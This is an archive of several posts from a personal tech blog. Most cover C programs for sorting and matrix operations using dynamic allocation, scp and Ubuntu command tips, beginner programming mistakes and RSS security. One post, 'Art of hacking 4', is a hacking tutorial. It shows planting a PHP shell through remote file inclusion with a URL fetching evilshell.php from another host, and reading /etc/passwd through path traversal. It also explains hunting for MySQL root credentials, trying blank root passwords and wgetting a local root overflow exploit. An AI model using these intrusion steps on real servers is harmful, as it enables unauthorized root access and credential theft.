
Tuesday, 22 January 2013

Simple Sorting Algorithm Using DMA

This post provides the source code for a simple, naive integer sorting algorithm that exploits the dynamic memory allocation feature of C programming.

#include <stdio.h>
#include <stdlib.h>

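/*
 * Read n integers from stdin, sort them in ascending order with an
 * exchange (bubble) sort over a dynamically allocated buffer, and print
 * them one per line.
 *
 * Returns 0 on success, 1 when the item count is not a positive number,
 * when an item fails to parse, or when the allocation fails.
 *
 * The count typed by the user is validated before it becomes an
 * allocation size, so a negative or garbage value can never turn into a
 * huge or wrapped request; calloc() additionally checks n * sizeof for
 * overflow, which a bare malloc(n * sizeof(int)) would not.
 */
int main(void)
{
 int *arr, i, j, n;

 printf("Enter the number of items: ");
 if (scanf("%d", &n) != 1 || n <= 0)
 {
  fprintf(stderr, "Invalid number of items\n");
  return 1;
 }

 /* sizeof *arr keeps the element size tied to arr's type. */
 arr = calloc((size_t)n, sizeof *arr);
 if (arr == NULL)
 {
  fprintf(stderr, "Out of memory\n");
  return 1;
 }

 for (i = 0; i < n; i++)
 {
  printf("Enter the %dth item: ", i + 1);
  if (scanf("%d", &arr[i]) != 1)
  {
   fprintf(stderr, "Invalid item\n");
   free(arr);
   return 1;
  }
 }

 /*
  * Bubble sort. After pass i the largest i + 1 values already sit at the
  * end, so the inner loop stops i short; a pass without a swap means the
  * array is sorted and the remaining passes can be skipped.
  */
 for (i = 0; i < n - 1; i++)
 {
  int swapped = 0;

  for (j = 0; j < n - 1 - i; j++)
  {
   if (arr[j] > arr[j + 1])
   {
    int temp = arr[j];
    arr[j] = arr[j + 1];
    arr[j + 1] = temp;
    swapped = 1;
   }
  }

  if (!swapped)
  {
   break;
  }
 }

 printf("The sorted array is:\n");

 for (i = 0; i < n; i++)
 {
  printf("%d\n", arr[i]);
 }

 free(arr);
 return 0;
}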
samar@samar-Techgaun:~$ gcc -Wall -o sort sort.c 
samar@samar-Techgaun:~$ ./sort 
Enter the number of items: 5
Enter the 1th item: 2
Enter the 2th item: 4
Enter the 3th item: 1
Enter the 4th item: 92
Enter the 5th item: 45
The sorted array is:
1
2
4
45
92





Matrix Multiplication Using DMA [C Source Code]

This post provides source code for matrix multiplication that dynamically allocates memory for the matrices to be multiplied and then multiplies them.

#include <stdio.h>
#include <stdlib.h>

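/*
 * Release a matrix built by alloc_matrix(): every row pointer, then the
 * row-pointer array itself. Accepts NULL (nothing to do) and rows that
 * were never allocated (free(NULL) is a no-op), so it can unwind a
 * partially built matrix.
 */
static void free_matrix(int **mat, int rows)
{
 int i;

 if (mat == NULL)
 {
  return;
 }
 for (i = 0; i < rows; i++)
 {
  free(mat[i]);
 }
 free(mat);
}

/*
 * Allocate a rows x cols matrix of int as an array of row pointers.
 * Returns NULL, with nothing leaked, if any allocation fails. The
 * caller owns the result and releases it with free_matrix().
 *
 * The row-pointer array is sized with sizeof *mat (an int *), not
 * sizeof(int): on a 64-bit target the latter under-allocates the
 * pointer array by half and every write past it is a heap overflow.
 * calloc() also checks the count * size product for overflow and
 * zero-fills the pointers so a partial failure can be unwound.
 */
static int **alloc_matrix(int rows, int cols)
{
 int i;
 int **mat = calloc((size_t)rows, sizeof *mat);

 if (mat == NULL)
 {
  return NULL;
 }
 for (i = 0; i < rows; i++)
 {
  mat[i] = calloc((size_t)cols, sizeof *mat[i]);
  if (mat[i] == NULL)
  {
   free_matrix(mat, rows);
   return NULL;
  }
 }
 return mat;
}

/*
 * Fill a rows x cols matrix from stdin in row-major order.
 * Returns 0 on success, -1 as soon as an element fails to parse.
 */
static int read_matrix(int **mat, int rows, int cols)
{
 int i, j;

 for (i = 0; i < rows; i++)
 {
  for (j = 0; j < cols; j++)
  {
   if (scanf("%d", &mat[i][j]) != 1)
   {
    return -1;
   }
  }
 }
 return 0;
}

/*
 * Print a prompt and read a "rows cols" pair.
 * Returns 0 on success, -1 if the input is not two positive integers;
 * a non-positive dimension is rejected here so it can never reach an
 * allocation or a loop bound.
 */
static int read_dims(const char *prompt, int *rows, int *cols)
{
 printf("%s", prompt);
 if (scanf("%d %d", rows, cols) != 2 || *rows <= 0 || *cols <= 0)
 {
  return -1;
 }
 return 0;
}

/*
 * Read an m x n matrix A and a p x q matrix B from stdin and print the
 * product A * B. Multiplication requires n == p; otherwise a message is
 * printed and the program exits normally, as before.
 *
 * Returns 0 on success (or on an incompatible size), 1 on malformed
 * input or allocation failure. All matrices are released on every path
 * via the single cleanup label.
 */
int main(void)
{
 int **A = NULL, **B = NULL, **C = NULL;
 int m, n, p, q, i, j, k;
 int rc = 1;

 if (read_dims("Enter the size of matrix A: ", &m, &n) < 0 ||
     read_dims("Enter the size of matrix B: ", &p, &q) < 0)
 {
  fprintf(stderr, "Invalid matrix size\n");
  return 1;
 }

 if (n != p)
 {
  printf("Matrix multiplication is not possible for given size\n\n");
  return 0;
 }

 A = alloc_matrix(m, n);
 B = alloc_matrix(p, q);
 C = alloc_matrix(m, q);
 if (A == NULL || B == NULL || C == NULL)
 {
  fprintf(stderr, "Out of memory\n");
  goto out;
 }

 printf("Enter the matrix A:\n\n");
 if (read_matrix(A, m, n) < 0)
 {
  fprintf(stderr, "Invalid matrix element\n");
  goto out;
 }

 printf("Enter the matrix B:\n\n");
 if (read_matrix(B, p, q) < 0)
 {
  fprintf(stderr, "Invalid matrix element\n");
  goto out;
 }

 /* C[i][j] = sum over k of A[i][k] * B[k][j]; C rows start zeroed by
  * calloc, and the int arithmetic is unchecked for overflow on large
  * entries, exactly as in the original. */
 for (i = 0; i < m; i++)
 {
  for (j = 0; j < q; j++)
  {
   for (k = 0; k < n; k++)
   {
    C[i][j] += A[i][k] * B[k][j];
   }
  }
 }

 printf("Multiplication of given matrices is: \n\n");

 for (i = 0; i < m; i++)
 {
  for (j = 0; j < q; j++)
  {
   printf("%d ", C[i][j]);
  }
  printf("\n");
 }

 rc = 0;

out:
 free_matrix(A, m);
 free_matrix(B, p);
 free_matrix(C, m);
 return rc;
}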
samar@samar-Techgaun:~$ gcc -Wall -o matrix_mul matrix_mul.c
samar@samar-Techgaun:~$ ./matrix_mul 
Enter the size of matrix A: 3 2
Enter the size of matrix B: 2 3
Enter the matrix A:

1 2
3 4
5 6
Enter the matrix B:

1 2 3
4 5 6
Multiplication of given matrices is: 

9 12 15 
19 26 33 
29 40 51 




Thursday, 17 January 2013

Addition Of Two Matrices Using DMA [C Source Code]

Here is the source code in C that uses the DMA function malloc() to dynamically allocate memory for two matrices and find their sum.
#include <stdio.h>
#include <stdlib.h>

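/*
 * Release a matrix built by alloc_matrix(): every row pointer, then the
 * row-pointer array itself. Accepts NULL (nothing to do) and rows that
 * were never allocated (free(NULL) is a no-op), so it can unwind a
 * partially built matrix.
 */
static void free_matrix(int **mat, int rows)
{
 int i;

 if (mat == NULL)
 {
  return;
 }
 for (i = 0; i < rows; i++)
 {
  free(mat[i]);
 }
 free(mat);
}

/*
 * Allocate a rows x cols matrix of int as an array of row pointers.
 * Returns NULL, with nothing leaked, if any allocation fails. The
 * caller owns the result and releases it with free_matrix().
 *
 * The row-pointer array is sized with sizeof *mat (an int *), not
 * sizeof(int): on a 64-bit target the latter under-allocates the
 * pointer array by half and every write past it is a heap overflow.
 * calloc() also checks the count * size product for overflow and
 * zero-fills the pointers so a partial failure can be unwound.
 */
static int **alloc_matrix(int rows, int cols)
{
 int i;
 int **mat = calloc((size_t)rows, sizeof *mat);

 if (mat == NULL)
 {
  return NULL;
 }
 for (i = 0; i < rows; i++)
 {
  mat[i] = calloc((size_t)cols, sizeof *mat[i]);
  if (mat[i] == NULL)
  {
   free_matrix(mat, rows);
   return NULL;
  }
 }
 return mat;
}

/*
 * Fill a rows x cols matrix from stdin in row-major order.
 * Returns 0 on success, -1 as soon as an element fails to parse.
 */
static int read_matrix(int **mat, int rows, int cols)
{
 int i, j;

 for (i = 0; i < rows; i++)
 {
  for (j = 0; j < cols; j++)
  {
   if (scanf("%d", &mat[i][j]) != 1)
   {
    return -1;
   }
  }
 }
 return 0;
}

/*
 * Print a prompt and read a "rows cols" pair.
 * Returns 0 on success, -1 if the input is not two positive integers;
 * a non-positive dimension is rejected here so it can never reach an
 * allocation or a loop bound.
 */
static int read_dims(const char *prompt, int *rows, int *cols)
{
 printf("%s", prompt);
 if (scanf("%d %d", rows, cols) != 2 || *rows <= 0 || *cols <= 0)
 {
  return -1;
 }
 return 0;
}

/*
 * Read two matrices of the same size from stdin and print their sum.
 * If the sizes differ a message is printed and the program exits
 * normally, as before.
 *
 * Returns 0 on success (or on mismatched sizes), 1 on malformed input or
 * allocation failure. All matrices are released on every path via the
 * single cleanup label.
 *
 * The result is printed as m rows of n columns. The original printed it
 * with the bounds swapped (n rows of m columns), which only works when
 * m == n and indexes out of bounds otherwise.
 */
int main(void)
{
 int **A = NULL, **B = NULL, **C = NULL;
 int m, n, p, q, i, j;
 int rc = 1;

 if (read_dims("Enter the size of matrix A: ", &m, &n) < 0 ||
     read_dims("Enter the size of matrix B: ", &p, &q) < 0)
 {
  fprintf(stderr, "Invalid matrix size\n");
  return 1;
 }

 if (m != p || n != q)
 {
  printf("Matrix addition is not possible for given size\n\n");
  return 0;
 }

 A = alloc_matrix(m, n);
 B = alloc_matrix(m, n);
 C = alloc_matrix(m, n);
 if (A == NULL || B == NULL || C == NULL)
 {
  fprintf(stderr, "Out of memory\n");
  goto out;
 }

 printf("Enter the matrix A:\n\n");
 if (read_matrix(A, m, n) < 0)
 {
  fprintf(stderr, "Invalid matrix element\n");
  goto out;
 }

 printf("Enter the matrix B:\n\n");
 if (read_matrix(B, m, n) < 0)
 {
  fprintf(stderr, "Invalid matrix element\n");
  goto out;
 }

 /* Element-wise sum; int overflow on large entries is unchecked, as in
  * the original. */
 for (i = 0; i < m; i++)
 {
  for (j = 0; j < n; j++)
  {
   C[i][j] = A[i][j] + B[i][j];
  }
 }

 printf("The addition of two matrices is: \n\n");

 for (i = 0; i < m; i++)
 {
  for (j = 0; j < n; j++)
  {
   printf("%d ", C[i][j]);
  }
  printf("\n");
 }

 rc = 0;

out:
 free_matrix(A, m);
 free_matrix(B, m);
 free_matrix(C, m);
 return rc;
}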


Below is a sample run along with the compilation step.

samar@samar-Techgaun:~$ gcc -Wall -o matrix_addn matrix_addn.c
samar@samar-Techgaun:~$ ./matrix_addn 
Enter the size of matrix A: 2 2
Enter the size of matrix B: 2 2
Enter the matrix A:

1 2
3 4
Enter the matrix B:

4 3
2 1
The addition of two matrices is: 

5 5 
5 5 




Tuesday, 15 January 2013

Transpose Of Matrix Using DMA [C Source Code]

This snippet uses the dynamic memory allocation function malloc() and finds the transpose of a user-provided matrix.

Below is the source code:

#include <stdio.h>
#include <stdlib.h>

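/*
 * Release a matrix built by alloc_matrix(): every row pointer, then the
 * row-pointer array itself. Accepts NULL (nothing to do) and rows that
 * were never allocated (free(NULL) is a no-op), so it can unwind a
 * partially built matrix.
 */
static void free_matrix(int **mat, int rows)
{
 int i;

 if (mat == NULL)
 {
  return;
 }
 for (i = 0; i < rows; i++)
 {
  free(mat[i]);
 }
 free(mat);
}

/*
 * Allocate a rows x cols matrix of int as an array of row pointers.
 * Returns NULL, with nothing leaked, if any allocation fails. The
 * caller owns the result and releases it with free_matrix().
 *
 * The row-pointer array is sized with sizeof *mat (an int *), not
 * sizeof(int): on a 64-bit target the latter under-allocates the
 * pointer array by half and every write past it is a heap overflow.
 * calloc() also checks the count * size product for overflow and
 * zero-fills the pointers so a partial failure can be unwound.
 */
static int **alloc_matrix(int rows, int cols)
{
 int i;
 int **mat = calloc((size_t)rows, sizeof *mat);

 if (mat == NULL)
 {
  return NULL;
 }
 for (i = 0; i < rows; i++)
 {
  mat[i] = calloc((size_t)cols, sizeof *mat[i]);
  if (mat[i] == NULL)
  {
   free_matrix(mat, rows);
   return NULL;
  }
 }
 return mat;
}

/*
 * Fill a rows x cols matrix from stdin in row-major order.
 * Returns 0 on success, -1 as soon as an element fails to parse.
 */
static int read_matrix(int **mat, int rows, int cols)
{
 int i, j;

 for (i = 0; i < rows; i++)
 {
  for (j = 0; j < cols; j++)
  {
   if (scanf("%d", &mat[i][j]) != 1)
   {
    return -1;
   }
  }
 }
 return 0;
}

/*
 * Read an m x n matrix from stdin and print its n x m transpose.
 *
 * Returns 0 on success, 1 on malformed input (a size that is not two
 * positive integers, or an element that fails to parse) or allocation
 * failure. Both matrices are released on every path via the single
 * cleanup label.
 *
 * The prompts and the row terminator use real "\n" escapes so the output
 * matches the documented sample run; the literal "n" characters that
 * appeared in them printed no newlines at all.
 */
int main(void)
{
 int **matrix = NULL, **transpose = NULL;
 int m, n, i, j;
 int rc = 1;

 printf("Enter the size of matrix: ");
 if (scanf("%d %d", &m, &n) != 2 || m <= 0 || n <= 0)
 {
  fprintf(stderr, "Invalid matrix size\n");
  return 1;
 }

 matrix = alloc_matrix(m, n);
 transpose = alloc_matrix(n, m);
 if (matrix == NULL || transpose == NULL)
 {
  fprintf(stderr, "Out of memory\n");
  goto out;
 }

 printf("Enter the matrix:\n\n");
 if (read_matrix(matrix, m, n) < 0)
 {
  fprintf(stderr, "Invalid matrix element\n");
  goto out;
 }

 for (i = 0; i < m; i++)
 {
  for (j = 0; j < n; j++)
  {
   transpose[j][i] = matrix[i][j];
  }
 }

 printf("The transpose of given matrix is: \n\n");

 for (i = 0; i < n; i++)
 {
  for (j = 0; j < m; j++)
  {
   printf("%d ", transpose[i][j]);
  }
  printf("\n");
 }

 rc = 0;

out:
 free_matrix(matrix, m);
 free_matrix(transpose, n);
 return rc;
}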


Below is the sample run:

samar@Techgaun:~$ gcc -Wall -o transpose transpose.c 
samar@Techgaun:~$ ./transpose 
Enter the size of matrix: 2 3
Enter the matrix:

1 2 3
4 5 6
The transpose of given matrix is: 

1 4 
2 5 
3 6




Thursday, 16 February 2012

Art of hacking 4 - spyd3rm4n's guide to hacking

Well this is the part 4 of the art of hacking series I've been posting here. Since the original site dmz has been down since long time, I have been uploading these tutorials. This part of tutorial explains what a PHP shell is and how you can use the php shell to gain the root access in the servers.

[0x01] PHP_Shell - what it is
[0x02] Root
[0x03] Obtaining_Root

Sub PHP_Shell{
What is a PHP Shell you may ask yourself. A PHP Shell is exactly what it says. It is a shell written in PHP that is used to emulate console and contains automated scripts to help you do whatever it is that you need. My favorite shell is the x2300, although it is hard to come by.
}

Sub Root{
root is the user on a nix based OS that has all privileges to do anything wished. Obtaining it through a PHP Shell can be a long and frustrating process.

The first thing that needs to be done, is the get a PHP Shell on the system. This can be done through and RFI (Remote File Inclusion) vulnerability.

Example: http://site.com/index.php?page=about.php
You can use this as an LFI (Local File Inclusion) and RFI.

http://site.com/index.php?page=../../../../../etc/passwd

This will show the passwd on the linux box. Giving you directory listing for every user on it.

http://site.com/index.php?page=http://anothersite.com/evilshell.php

This will include the evilshell.php located at anothersite.com

Looking for a vulnerability in a script:
The easiest way to find an LFI/RFI is to look for something like

include();
@include();

as long as the include() function includes user input, like

$page = $_GET['page'];

This is the GET method, $page is assigned to the value of page. http://site.com/index.php?page=
@include($page);

^ Jackpot.

Once the shell is on the site, you can look around for anything useful on the box that can be used to obtain root. I suggest looking for config files that contain mysql information. If you find the resellers config or global.inc file and it contains root mysql information, you can use this to look through the mysql database for any software that requires root input.
Example:

Lets say for the sake of this tutorial, I have software on my computer that requires root to run. So I have to give it the root user and password. This is stored in the mysql database. Once someone is in the mysql database and finds the information for that software, they will see the root user and pw for the box.

That is one of the most common ways of obtaining root through research. One thing to note, is that hosting companies often forget to assign a password for root mysql. So if you have a PHP Shell, try connecting to the SQL Database using the user root and no password. Funny how there is no fix for human error.

Another way to obtain root is through an overflow. You can get these root shells, usually scripts that will exploit and overflow a process running as root to spill out/change/grant a user root privileges.
Example:

There is a process running as root, this process is a result of the program called shell_av (Shell AntiVirus)

Now, lets say I know a local root overflow exploit for shell_av. I will create a script using shell code (which will be covered in the mini-book stack/buffer overflows) in C that will overflow this app and use the PHP Shell to wget it from a remote server so I don't have to type it all up in that little cmd box.

Once executed the cmd box will output the information for that overflow. Let's say that the overflow only granted the user that the shell is on root priviledges.
(The PHP Shell is located on in the directory of /home/bob/public_html/ - bob is the user)
This would grant bob root privileges. Now all you have to do is get bob's password and login SSH, and you have complete control of the box.
}

- Credits : Kr3w of TheDefaced.



Tuesday, 14 February 2012

Hacking Step by Step For Beginners [Guest Post]

This article is an excellent step-by-step tutorial for those who want to be hackers. Don't expect it to teach you a step-wise process for hacking a website or an e-mail address. Instead, this tutorial aims to help you understand how you should proceed to really understand computer systems so that you become a real computer hacker.


"How do you hack"? "I wanna to learn hacking". "How to get started"?
"How can I get the password"? "How do I crack "?


Does this sound like you? who needs to learn how to hack? And nobody
will even speak to you much less send you any info???


Fear not!!! Here are step-by-step instructions on how to become a
hacker. Simply follow the instructions given below, and when you get to
the end you will be a real hacker.

Ok, here are the step-by-step instructions. Follow them exactly and you
will be a real hacker. Once you are comfortable with, you can branch out
into other areas...

[1] Well, if you are a real novice on, it is hard, you wouldn’t be
reading this document now anyways! For starter now get a gud INTERNET
connection.

[2] Now, Net runs on Unix base system, I guess there will be no harm
saying that, since >80% server uses Linux! So naturally, you have to do
the same. So download a any Linux distribution (starters Linux Mint
would be really helpful).

[3] Its time for change! and for real! Install Linux in full hard drive!
Its not like I'm the enemy of other OS, its just the human nature to
avoid the change! if its critical Re-partition your hard drive for dual
boot. If you are using Windows don't even bother about it, they are for
lamer anyway.

[4] Get comfortable with Linux environment. Till this point you learn
about major distribution & their philosophies. You try different stuffs!
Change themes, install software! write your own review in blogs, create
fb pages and google groups and post lot [I wonder how many are still
active!]
"Ahh! awesome! just can't wait for new release of 12.04" something like
that.

[5] Start learning about a programming language called C. You try to
switch between the different IDE, and some bozo will tell you C is just
back screen! no GUI try something like JAVA which is worthless shit( या हावा)! don't be
fooled by them coz real hacker will never use the worthless shit (हावा) like JAVA.

[6] This is the time where you find your self into the religious cult of
the distro's. Now start learning Black Screen with blinki cursor called
shell. You will realized the importance of that black screen! (I bet you
hated the Blue screen while in the far past you still used windows).
Learn till the point so you don't need to touch Mouse or need GUI.

[7] You grow impatient can't find stuff which you want! And someone tell
you ask in IRC they are very decent folks! and really helpful. You make
fool out of yourself taking with bots or Getting kicked out / banned.
You realize you should read the Rules which eventually make your habit
of reading the man pages of every command even though you don't get it.
Dunn't worry your are 5% of the way out of lamerland!

[8] You find the gcc is not only the C complier but collection of
complies. Its man pages can be turn into 500 pages book. In mean time
branch out to some cool scripting languages like python, Perl. You might
also wanna write your own Linux programs. Read them use them Read them
again, because most of what you read the first time confused you.
Now play with Perl, C, C++ on your system until you can actually
program. Now practice programming for a while until you get at least a
little good at it. Give yourself plenty time to practice.

[9] Its the time when you have the Linux Journal Archive. Now its time
to grab some book called Operating System. Now its time to leave your
बच्चा Linux to something serious. I guess you would have now realize what
you are using was totally for posers. If not you don't think so you have
still some years left.

[10] By this time wikipedia, distro forum, programming forums would have
been your most visited sited, and u realize the groups in the fb are
filled with posers and bozo. You understand the true meaning of hacking
and you stock piled the books and might have also running Apache server!
FTP and samba too.

[11] Install non-childish(non-बच्चा) Linux on your system. Install everything. If your
system boots up properly to Linux, then congrats! Now that you are
running a real OS, read the docs, man pages, how-to's, FAQs, etc. Of
course, you won't understand most of it right away, but read all this
stuff anyway, so you will know where to look later. Read it all? Ok, go
back and read it again. You are 5% of the way to be hacker!

[12] Now configure your system for you have tons of text files to edit,
and you realize the GUI installer is useless after all. But at this
point you might possibly know enough to actually ask a partly
intelligent question on the net. You subscribe tons of mailing list.
Whatever you do, DON'T POST ANYTHING, because nobody wants to read
anything you have to say yet. Just lurk for a year or two. You *might*
now be IRC (as long as nobody remembers you were one who use to talk
with bots).

[13] Now you need to get and read all the RFCs. These contain
information that is vital if you want to hack the net. Again, you didn't
understand everything the first time, so read them
all again. You learn about the Cryptography, File sharing, SSH, SSL,
802.11, lots of stuffs. By this time you would have 100 books regarding!
and long list of your personal notes and reference cards.

[14] Now, you understand the developer mailing list one you subscribed
long time back and few security related mailing lists which you used to
ignore and divert them to trash. You should have enough info to try
some simple hacks, so try some. If they work, great, you are almost a
junior hacker. If they don't work, then do some more reading and try
again. Don't give up, keep at it even if it takes you a few years.

[15] Explore the net. Try things. Look for security holes. Read a lot of
source code. Write some hacking utilities. At this point, you are now a
real junior hacker and start pasting someone’s database in paste bin!

This whole process does take a little bit of time, but it is the
quickest way for an lamer to learn to hack. Some of you lamer don't have
the brain power to complete the above 15 steps, but try anyway...

True, this might take you a few years, but it will be worth the wait. If
you post anything too early, people will know that you are still a lamer
and wanna-be, and everyone will laugh at you and flame you and call you
nasty names, just like when you were on Windows!

Reference and Copies:

17 Steps to Hack
Ubuntards
some cools stuff which i can't remember

The article was originally contributed by rhoit in the foss-nepal mailing list.




Sunday, 18 December 2011

Copying Files From Remote Server Using SCP In Linux

Hi everybody, sometimes you need to copy files from a remote server and the only thing you have access to might be SSH. If you can access the remote server via SSH, then you can copy files from it using scp (secure copy). This short tip will help you copy files from a remote server using scp.

scp is a remote secure file copy program that uses SSH for the data transfer and for authentication. The general syntax is as below:

scp -P ssh_port user@server:remote_file_path local_file_path

The following is the command I used to copy a file from a remote server to my computer. It will ask for the password of the corresponding user before the file is copied.

scp -P 222 netadmin@192.168.0.1:/home/kubh/Desktop/torrent_trackers_list.txt /samar/torrent_trackers.txt

Also, there are GUIs for this purpose as well such as WinSCP for windows and Krusader file manager and gftp for linux distros. GUI would make things easier but still I am used to with command lines and I hope you are as well.

I hope this helps. :)

Edit (Dec 19): Paths containing whitespace must be escaped with the \ character. An example of this is as below:

samar@Techgaun:~$ scp -P 222 "netadmin@192.168.0.1:/home/netadmin/Downloads/Hostel\ Part\ III\ \(2011\)\ DVDRip\ 400MB/HOST.DVD_urgrove.com.mkv.002" /samar/Moviez/Hostel1.mkv.002


Tuesday, 22 November 2011

Common Programming Mistakes Beginner Programmers Do

Beginner programmers make some common mistakes, which might be due to a lack of practice and of deeper understanding of the language syntax and semantics. Here I am listing some of the common programming mistakes every programmer makes when s/he is a beginner or new to programming.

Mistake #1: Lack of code modularization
Many beginners just write everything within the main function and end up repeating many statements again and again. Rather than having everything within a single main function, you could separate the certain logic in a separate module known as function and then just call that function when needed. If you haven't heard about function, start with google and learn to write some. You'll not regret learning to make functions.

Mistake #2: Another common mistake is not indenting your code (read the section Indentation in programming in the Wikipedia entry) and not writing proper comments in the places where they are necessary. Lack of proper indentation and comments reduces readability. While many compilers and interpreters do not care about indentation and comments, human eyes find properly indented and commented code easier to understand. Also, some languages such as Python rely on indentation, where indentation is a must.

Mistake #3: Another common mistake is to use '=' instead of '=='. I've seen this mistake in a lot of code written by my beginner friends, usually in conditional statements (such as if/else), thus resulting in a completely wrong output many times. FYI, '=' is the assignment operator while '==' is the is-equal-to operator. Note that when '=' is used, the variable on the left side of '=' gets set to the value of the expression on the right. The assignment operator changes the variable on the left to have a new value, while the equality operator '==' tests for equality and returns true or false.

Mistake #4: Integer and float division is also another common mistake every beginner programmer happens to do. In the language like C, the division such as 5/10 will result in 0 since 5 and 10 both are integers and integer division is done. This might lead to mathematical errors in programming. So be sure to typecast the variables to the proper data type before performing division.

Mistake #5: Another common mistake is the use of uninitialized variables. Beginners forget to assign the values to the variables thus giving unexpected outputs such as garbage values in C. Some languages provide default values (such as 0 or null) for uninitialized variables but still using uninitialized variable is a mistake to avoid. Also, many forget to declare the variables thus producing compiler error.

Mistake #6: Another mistake is to compare strings in C (strings in C are arrays of characters) using the is-equal-to '==' operator, which only compares the two pointers, not the characters. String comparison in C requires library functions such as strcmp(), strcmpi() and their bounded alternatives strncmp() and strncmpi(). Btw, prefer the bounded variants: strcmp() and strcmpi() keep reading until they find a NUL terminator, so on a buffer that is not properly terminated they read past its end.

Mistake #7: Using the wrong range of array indices is another common mistake beginners make. For example, an array of size 10 should be accessed using indices from 0 to 9, not from 1 to 10. In some other languages, such as Matlab and Fortran, indices go from 1 to 10. Just make sure you understand the specifications of the language you are learning.

Mistake #8: Using function calls within the looping condition is another mistake. Lets take an example of the following code snippet:

for (i = 0; i < strlen(str); i++) { //do something }


In each iteration, the strlen() function is called again, which walks the whole string every time and can slow down your program. So hoist such loop-invariant calls out of the loop condition:

/* Hoisted: the length is computed once. Note that strlen() returns size_t, so storing it in an int is a narrowing conversion (-Wconversion warns); declaring len as size_t matches the type. */
int len = strlen(str);
for (i = 0; i < len; i++) { //do something }


Mistake #9: Another mistake is the use of insecure and vulnerable functions. Before using a function, read its documentation to know whether it can be used safely and what the secure alternative is: in C, gets() can never be used safely (use fgets() with the buffer size), and unbounded strcpy()/strcat()/sprintf() should give way to bounded forms such as snprintf(). Buffer overflows are one of the things you should always try to prevent. If you are doing PHP or another web language, use parameterised queries (prepared statements) to avoid SQL injection and context-aware output encoding (e.g. htmlspecialchars()) to avoid cross-site scripting, rather than relying on ad-hoc filtering of input. Always research how to write secure code so that attackers cannot break it.

Mistake #10: Finally, beginners tend to give up on what they are doing if they cannot locate the errors and mistakes in their code. Just remember that studying and practising is the only key to mastering anything, and that applies to programming as well. You've got such a big resource as the internet, so make extensive use of it and never give up. Just read and practise and you'll eventually master it.

I hope this post helps beginner programmers out there. :)



Wednesday, 26 October 2011

Useful and Basic Commands and Shortcuts For Ubuntu Beginners

One of my friends asked me to list useful commands and shortcuts for him to use in his ubuntu distro. I listed some pretty useful ones and am also sharing them over here.

Basic Commands

Alt + F1: Opens application menu.
Alt + F2: Opens run command(something similar to run command in windows)
Ctrl +Alt + FN: Switch to TTYN terminals
Ctrl +Alt + F7: Switch to X Display
mkdir <dir_name>: Create a directory
cd $HOME: Set the current path as your home directory
cd /: Set the current path as root filesystem

Privileged commands: Note that most of these commands require sudo privileges, which are granted in /etc/sudoers (and /etc/sudoers.d/); on Ubuntu, membership of the sudo (or older admin) group is what normally grants them. Always edit that file with visudo, which checks the syntax before saving — a broken sudoers file can lock you out of sudo entirely.

sudo su: Run the shell as root user (sudo -i is the cleaner equivalent). Prefer running individual commands with sudo over keeping a root shell open — everything typed into a root shell runs with full privilege, and sudo logs each invocation, which keeps an audit trail.
sudo su user: Run the shell as the user specified (equivalently, sudo -u user -i)
sudo command: Run the specified command with root privilege
gksudo command: Run the specified command as graphical root mode.(used for graphical programs)
passwd: Change your password

Basic Network Commands

ifconfig: Displays information about network. Also, ifconfig interface would give information about the specified interface.
iwconfig: Displays information about wireless network
ping host_or_IP: Pings to check if the specified host or IP is online or not. Also useful for knowing if you are connected to some other network eg. internet.
host ip_addr: Displays hostname for specified IP address by querying nameservers specified in /etc/resolv.conf
ifup interface: Bring the specified network up.
ifdown interface: Bring the specified network down.
ssh user@hostname -p PORTNO: Establish an SSH connection to the specified host and port number and log in as the specified user. On the first connection, check the host key fingerprint the client shows you against one obtained out of band, and never ignore a "REMOTE HOST IDENTIFICATION HAS CHANGED" warning — that is exactly what a man-in-the-middle looks like.

Commands For Package Management: These commands require root privilege, so either precede each command with sudo (preferred) or escalate to a root shell with sudo -i.

apt-get install package1 package2 .. packageN: Download and install the package(s) specified.
apt-get install -d package: Just download the packages(no installation)
apt-get update: Refresh the package index (run this before installing or upgrading).
apt-get dist-upgrade: Upgrade all installed packages, adding or removing packages as needed to resolve changed dependencies (this does not change the Ubuntu release).
do-release-upgrade: Perform distro version upgrade (e.g. to the next Ubuntu release).
apt-get remove package: Remove the specified package(s).
apt-get -f install: Fix packages problem.
dpkg --configure -a: Fix broken packages.

Other/Misc. Commands

id: Displays user and group IDs for current user.
uname -a: Displays all kernel information
gedit: Open text editor
nautilus: Open nautilus file manager
gksudo nautilus: Open root nautilus file manager
lsb_release -a: Get information about installed ubuntu version

These are some of the commands that have come to mind as of now. I might update this list when other commands come to mind. By the way, TAB is very useful in the terminal as it auto-completes and suggests commands and file names in Ubuntu. What this means is that if you type do- and then press TAB, it will auto-complete the command to do-release-upgrade, saving some valuable time. Also be sure to share your useful commands in the comment section below.



Sunday, 9 October 2011

Rip Audio CDs With Windows Media Player

You need not download any other Audio CD ripping software in windows to rip your Audio CD as Audio CD ripping can be easily done with windows media player. I was thinking I might need to download ripping tools but I just guessed WMP might also have such feature and yeah it had easy way to do so. I'm here to help those non-techie people out there rip the audio CD.
First insert your Audio CD and play it with windows media player. There's a ripping option directly available in the interface. The screenshot provided below will help you to adjust your ripping settings. You might want to adjust the rip settings from the interface itself. Then select the tracks that you want to rip and click on the Rip CD button. Ripping will take few minutes and then output folder will open.




Monday, 26 September 2011

RSS and Related Security Issues For Business People

While RSS is a very simple way to expand your business and nothing complex is involved in RSS feed systems, you should never underestimate the security issues in any digitized systems, not even in really simple technology like RSS. A business company should always be aware of possible security risks in any system they are employing to help them in their tasks.


Most of you might believe there would not be much security issues in RSS feeds and feel that you need not worry about any cases of exploiting of your system but that's just a myth. Malicious attackers can inject scripts inside the feeds and affect thousands of feed readers with even a single vulnerability discovered in the popular RSS reader or aggregators.

Bad HTML or javascript can be injected as malware inside the feeds and if your business is gathering content from other sources and adding them to feeds, your feeds are likely to be affected by such malwares. Such scripts are generally injected in the feed titles, descriptions, links and other components of the RSS feeds. The scripts injected can exploit the possible vulnerabilities in the RSS readers of your subscribers leading to possible control of your subscriber's PC by the attacker. This can open possible backdoors by the installation of trojans or keyloggers using the proper exploits such as browser exploits, activex exploits, etc. and let the attacker steal the data by using possible local zone security attacks which can be the worst thing you can imagine happening to your business as customers are the life blood of every business and you engage customers everywhere. And if your customers are affected, then ultimately your business will be affected. Hence extreme care should be taken while importing content from other sources to develop your RSS contents.

